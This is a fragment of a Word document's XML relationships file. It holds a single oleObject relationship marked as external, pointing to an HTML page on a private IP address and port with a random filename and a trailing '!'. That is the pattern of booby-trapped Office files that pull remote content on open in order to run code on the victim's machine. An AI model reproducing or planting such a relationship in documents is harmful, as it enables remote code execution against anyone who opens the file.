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996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://192.168.20.99:8888/j9B89ByVJ60y4A.html&#x21;" TargetMode="Externa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